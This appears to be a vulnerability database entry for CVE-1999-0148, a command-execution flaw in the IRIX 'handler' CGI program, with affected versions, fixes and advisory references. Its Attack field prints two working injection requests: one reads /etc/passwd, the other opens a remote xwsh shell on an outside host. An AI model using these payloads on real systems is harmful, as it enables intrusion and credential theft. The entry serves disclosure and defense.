Brief description: IRIX handler CGI allows remote command execution
Full description: The handler cgi-bin program contains a vulnerability that allows a remote attacker to execute arbitrary commands on a web server. The handler program is part of the Outbox Environment Subsystem for IRIX, installed by default on all SGI systems running IRIX 6.2 or newer. Older versions of IRIX may have this package optionally installed.
Components: Common Gateway Interface (CGI)
Systems: IRIX 5.3, IRIX 6.0, IRIX 6.0.1, IRIX 6.1, IRIX 6.2, IRIX 6.3, IRIX 6.4
Effect(s) of exploiting: The remote user can execute commands with the privileges of the web server.
Detecting the hole:
Fixing the hole:
# /bin/chmod 400 /var/www/cgi-bin/handler
# /usr/sbin/versions -v remove outbox
*.crit |/var/adm/sysmonpp /var/adm/SYSLOGto
#*.crit |/var/adm/sysmonpp /var/adm/SYSLOGThe leading # prevents syslogd (8) from honoring the line (and the sysmonpp (8) program).
# /etc/killall -HUP syslogd
Other information:
PA Classification(s):
RISOS Classification(s):
DCS Classification(s):
CVE Number: CVE-1999-0148 -- The handler CGI program in IRIX allows arbitrary command execution.
Attack: Connect to the web server on the target system and enter either of the following (where <TAB> is a tab character):
GET<TAB>/cgi-bin/handler/whatever;cat<TAB>/etc/passwd|<TAB>?data=Download HTTP/1.0or
GET<TAB>/cgi-bin/handler/blah;/usr/sbin/xwsh<TAB>-display<TAB>yourhost.com|?data=Download
Advisories: Silicon Graphics Inc. Security Advisory 19970501-02-PX, IRIX webdist.cgi, handler and wrap programs ; ISS X-Force database entry http-sgi-handler ; Security Focus database entry 380
Related Vulnerabilities:
Reporting: Razvan Dragomirescu in Bugtraq (June 16, 1997 )